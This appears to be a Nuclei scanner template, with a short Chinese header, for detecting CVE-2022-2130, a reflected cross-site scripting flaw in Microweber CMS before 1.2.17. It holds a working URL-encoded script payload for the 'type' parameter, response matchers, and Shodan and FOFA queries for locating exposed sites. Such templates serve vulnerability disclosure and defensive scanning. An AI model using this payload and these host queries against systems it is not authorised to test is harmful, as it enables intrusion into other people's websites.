漏洞描述
Cross-site Scripting (XSS) vulnerability in the /demo/editor_tools/module endpoint via the 'type' parameter.
CVE-2022-2130: Microweber < 1.2.17 - Cross-Site Scripting
PoC代码[已公开]
id: CVE-2022-2130
info:
name: Microweber < 1.2.17 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site Scripting (XSS) vulnerability in the /demo/editor_tools/module endpoint via the 'type' parameter.
impact: |
Successful exploitation could allow an attacker to execute malicious scripts in the context of a victim's browser, leading to potential data theft or account compromise.
remediation: |
Upgrade Microweber CMS to version 1.2.17 or later to mitigate the Reflected XSS vulnerability (CVE-2022-2130).
reference:
- https://huntr.com/bounties/0142970a-5cb8-4dba-8bbc-4fa2f3bee65c
- https://nvd.nist.gov/vuln/detail/CVE-2022-2130
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:L
cvss-score: 6.1
cve-id: CVE-2022-2130
cwe-id: CWE-79
epss-score: 0.10865
epss-percentile: 0.93129
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query:
- http.favicon.hash:780351152
- http.html:"microweber"
fofa-query:
- body="microweber"
- icon_hash=780351152
vendor: microweber
product: microweber
tags: cve,cve2022,microweber,xss
http:
- method: GET
path:
- "{{BaseURL}}/editor_tools/module?type=%22%3E%3Cdiv%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</tag><div><script>alert(document.domain)</script>"
- type: word
part: content_type
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a004730450220556b993762eb9fd50ec83a086d8c2f1d6fba60cf636c2f10dcebb559f4afda91022100c9861f9aa52b54b6fde6751027c9a5af38b900b39cbe3f6e63420a3b62fdab76:922c64590222798bb761d5b6d8e72950